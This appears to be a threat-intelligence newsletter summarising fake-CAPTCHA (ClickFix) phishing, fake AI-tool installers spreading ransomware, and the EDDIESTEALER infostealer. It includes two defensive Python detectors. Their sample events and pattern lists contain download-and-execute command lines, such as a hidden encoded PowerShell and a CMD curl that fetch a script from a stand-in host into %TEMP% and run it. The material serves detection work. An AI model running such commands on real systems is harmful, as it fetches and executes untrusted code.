TRENDING TOPICS JUNE 02, 2025

HuluCaptcha Phishing Campaign Using Fake CAPTCHA to Deploy Malware

A sophisticated phishing campaign built around a fake CAPTCHA system called "HuluCaptcha" has been uncovered. The campaign begins with phishing emails that direct users to fraudulent websites presenting seemingly legitimate CAPTCHA challenges; hidden malicious code is activated when victims interact with these prompts. This code leverages the Windows Run dialog (Win+R) to execute system commands, using PowerShell or CMD to download additional malware payloads. The attackers employ multiple layers of obfuscation, including Base64 encoding and custom ciphers, to evade detection by traditional security tools. The malicious JavaScript within the fake CAPTCHA interface keeps up the appearance of a legitimate verification process while the commands run silently in the background. This approach bypasses security solutions that do not monitor or restrict specific execution pathways, such as the shell: protocol handler in Windows. Once the malware is on a victim's system, it uses Windows Management Instrumentation (WMI) for persistence, creating scheduled tasks that periodically connect to command-and-control servers. The attack infrastructure relies on compromised WordPress sites as distribution points for the phishing pages. The malware is modular, allowing attackers to deploy payloads such as keyloggers, clipboard hijackers, or advanced data exfiltration tools targeting specific enterprise applications. To avoid detection, the attackers rotate their command-and-control servers and use certificate pinning to prevent traffic interception. Organizations are advised to implement enhanced monitoring for suspicious PowerShell and WMI activity, restrict execution from temporary directories, and deploy application allowlisting policies. Ongoing security awareness training is critical to help employees recognize and respond to increasingly sophisticated CAPTCHA-based phishing lures.

Fake AI Tool Installers Distribute Multiple Ransomware and Malware Families

Cybercriminals are exploiting the growing interest in artificial intelligence (AI) tools to distribute several dangerous ransomware families, including CyberLock and Lucky_Gh0$t, as well as a new malware called Numero. These threats are spread through fake installers for AI tools such as OpenAI's ChatGPT and InVideo AI, often promoted through SEO poisoning to boost search rankings and attract unsuspecting victims. Once downloaded, the malicious software deploys ransomware or other malware. Numero corrupts the Windows graphical user interface (GUI), rendering the system unusable by manipulating its desktop components. These campaigns primarily target users in business sectors that rely on AI tools, particularly B2B sales and marketing. The attackers often host the fake installers on compromised legitimate websites, convincing users that they are downloading free AI tools. Once executed, the malware gains persistence through registry keys and memory, complicating efforts to detect and remove it. Users are urged to be cautious when downloading AI tools and to verify the legitimacy of the source, especially when free access is promised. Organizations should enhance monitoring of systems for unusual activity, restrict downloads from untrusted sources, and deploy advanced endpoint protection to mitigate these risks.
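The summary above notes that the fake installers gain persistence through registry keys. A defender's first check after a suspicious "AI tool" download is therefore the autostart entries. The following Python audit is an added example, not code from the page or from any vendor cited in it: it takes Run-key values (here a constructed list rather than a live registry read) and flags entries that launch from user-writable directories, run through script hosts, or carry hidden-window or encoded-command flags. The value names, paths and reason strings are all assumptions made for the illustration.

```python
import re

# Directories a legitimate installer rarely uses for a persistent autostart, but where a
# browser-downloaded fake installer typically ends up (constructed pattern list).
USER_WRITABLE_RE = re.compile(
    r"\\appdata\\local\\temp\\|\\appdata\\roaming\\|\\downloads\\|\\users\\public\\|%temp%|%appdata%",
    re.I,
)
# Script hosts and LOLBins that are unusual as the direct target of an autostart entry.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe",
}
# Flags that hide a console or pass an encoded PowerShell command line.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-(?:e|enc|encodedcommand)\s|/min\b", re.I)


def executable_of(command: str) -> str:
    """Return the executable path from a Run-key command string (handles quoted paths)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def assess_autorun(entry: dict) -> list[str]:
    """Return the list of reasons an autostart entry looks like dropped-installer persistence."""
    command = entry["Data"]
    exe = executable_of(command)
    exe_name = exe.lower().rsplit("\\", 1)[-1]
    reasons = []
    if USER_WRITABLE_RE.search(command):
        reasons.append("launches from a user-writable directory")
    if exe_name in SCRIPT_HOSTS:
        reasons.append(f"autorun via script host or LOLBin {exe_name}")
    if HIDDEN_RE.search(command):
        reasons.append("hidden-window or encoded-command flags")
    return reasons


def audit(entries: list[dict]) -> dict[str, list[str]]:
    """Map each suspicious entry's value name to its reasons; clean entries are omitted."""
    return {e["Name"]: r for e in entries if (r := assess_autorun(e))}


# Constructed sample Run-key values; the names imitate AI-tool lures but are not real IoCs.
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_AUTORUNS = [
    {"Key": RUN_KEY, "Name": "ChatGPT Desktop",
     "Data": r'"C:\Users\alice\AppData\Local\Temp\chatgpt_setup\svc.exe" --silent'},
    {"Key": RUN_KEY, "Name": "VideoAI Updater",
     "Data": r'wscript.exe //B "C:\Users\alice\AppData\Roaming\VideoAI\upd.vbs"'},
    {"Key": RUN_KEY, "Name": "OneDrive",   # benign: vendor binary under Program Files
     "Data": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'},
    {"Key": RUN_KEY, "Name": "Helper",     # hidden, encoded PowerShell (placeholder payload)
     "Data": "powershell.exe -w hidden -enc QQBBAEEAQQA="},
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_AUTORUNS).items():
        print(f"{name}: {'; '.join(reasons)}")
```

On a real host the entries would come from `winreg` (HKCU and HKLM Run/RunOnce keys) or from an EDR's autoruns export; the scoring is deliberately simple so that each flagged reason maps to a mitigation the page already names (restricting execution from temporary directories, allowlisting).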

EDDIESTEALER Malware Exploits Fake CAPTCHA Pages to Harvest Sensitive Data

EDDIESTEALER is a new Rust-based information stealer distributed through a social engineering technique built on fake CAPTCHA verification pages, commonly known as ClickFix. In these attacks, threat actors compromise legitimate websites and serve malicious JavaScript that prompts users to complete a CAPTCHA. Once the victim interacts with the fake CAPTCHA, a PowerShell script is triggered via the Windows Run dialog, ultimately downloading and deploying EDDIESTEALER. The malware is designed to harvest sensitive information, including browser cookies, passwords, cryptocurrency wallet data, and system metadata. It bypasses Chrome's app-bound encryption using a Rust-based implementation of ChromeKatz, which extracts unencrypted browser data even when the browser is not actively running. The malware also employs evasion techniques, including self-deletion if it detects analysis tools or sandbox environments, making it difficult to detect and analyze. The campaign has been linked to active exploitation in the wild, with threat actors targeting specific industries, including the finance and cryptocurrency sectors, which are prime targets for data theft. The malware has been observed in attacks that use compromised websites and social media ads to distribute fake installers for popular AI tools. The threat actor behind this campaign demonstrates strong operational security, rotating command-and-control servers and encrypting communications to evade detection. EDDIESTEALER can steal extensive user information, including credentials from popular web browsers and password managers, and exfiltrate it to remote servers. Organizations should implement robust defenses, including endpoint detection and response (EDR), monitoring for suspicious PowerShell and browser activity, and application allowlisting policies.
The use of fake CAPTCHA prompts in phishing attacks highlights the increasing sophistication of social engineering tactics, making regular security training and vigilance crucial for users.
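Both the HuluCaptcha and the EDDIESTEALER write-ups above describe the same execution path: a fake CAPTCHA page gets the user to paste a PowerShell or CMD one-liner into the Run dialog, which then fetches a payload, often behind Base64 encoding and a hidden window. The following Python detector is an added example, not code from the page or from any vendor cited in it. It runs over process-creation events (a constructed list in Sysmon Event ID 1 style; the field names, paths and URLs are assumptions) and flags an interpreter spawned by explorer.exe when the command line, or the decoded -EncodedCommand argument inside it, also shows a download cradle, an evasion flag, or staging in a temporary directory.

```python
import base64
import re

# Interpreters a fake-CAPTCHA "verification" step typically pastes into Win+R.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")

# Download-and-execute cradles (assumed pattern list, matched case-insensitively).
CRADLE_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b"
    r"|\bcurl\b|\bbitsadmin\b|start-bitstransfer|\bmshta\b\s+https?://", re.I)
# Flags that hide the console, skip the profile, or bypass the execution policy.
EVASION_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-(?:ep|executionpolicy)\s+bypass", re.I)
# Payload staged in a temporary directory (the page recommends restricting execution there).
TEMP_RE = re.compile(r"%temp%|\$env:temp|\\appdata\\local\\temp\\", re.I)
# PowerShell -EncodedCommand and its short forms, followed by the Base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

EXPLORER_REASON = "interpreter launched from explorer.exe (Run dialog / shell: handler)"


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (UTF-16LE), or '' if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def analyze_event(event: dict) -> list[str]:
    """Return the ClickFix-style indicators present in one process-creation event."""
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmdline = event.get("CommandLine", "")
    if image not in INTERPRETERS:
        return []
    reasons = []
    if parent == "explorer.exe":
        reasons.append(EXPLORER_REASON)
    decoded = decode_encoded_command(cmdline)
    if decoded:
        reasons.append("encoded command decoded: " + decoded[:60])
    text = cmdline + "\n" + decoded        # inspect both the raw and the decoded layer
    if CRADLE_RE.search(text):
        reasons.append("download/execute cradle")
    if EVASION_RE.search(cmdline):
        reasons.append("hidden window / no profile / policy bypass flag")
    if TEMP_RE.search(text):
        reasons.append("payload staged in a temporary directory")
    return reasons


def is_clickfix_like(event: dict) -> bool:
    """Flag only when explorer.exe is the parent AND at least one other indicator is present."""
    reasons = analyze_event(event)
    return EXPLORER_REASON in reasons and len(reasons) >= 2


def scan(events: list[dict]) -> list[int]:
    """Indices of the events that look like a fake-CAPTCHA Run-dialog execution."""
    return [i for i, e in enumerate(events) if is_clickfix_like(e)]


def encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument; used here only to construct sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; none are artefacts of the campaigns described above.
SAMPLE_EVENTS = [
    {   # explorer.exe -> hidden PowerShell with an encoded download cradle
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -nop -ep bypass -enc " + encode_ps(
            "Invoke-WebRequest -Uri http://example.invalid/p.txt -OutFile $env:TEMP\\p.ps1; & $env:TEMP\\p.ps1"),
    },
    {   # cmd variant staging a script in %TEMP%
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": 'cmd.exe /c "curl -s http://example.invalid/u.txt -o %TEMP%\\u.bat && %TEMP%\\u.bat"',
    },
    {   # benign: an editor running a build script, not launched from the shell
        "ParentImage": r"C:\Program Files\Editor\editor.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoExit -File C:\\Users\\alice\\build.ps1",
    },
    {   # benign: user opens a console from explorer with no cradle or evasion flag
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe",
    },
]

if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print(i, analyze_event(SAMPLE_EVENTS[i]))
```

Requiring explorer.exe as the parent plus a second indicator keeps an ordinary user-opened console out of the alert queue; in production the same logic would be fed from Sysmon or EDR telemetry, and the decoded command would be retained for triage since the page notes the encoding exists precisely to hide the cradle from string-based controls.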

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.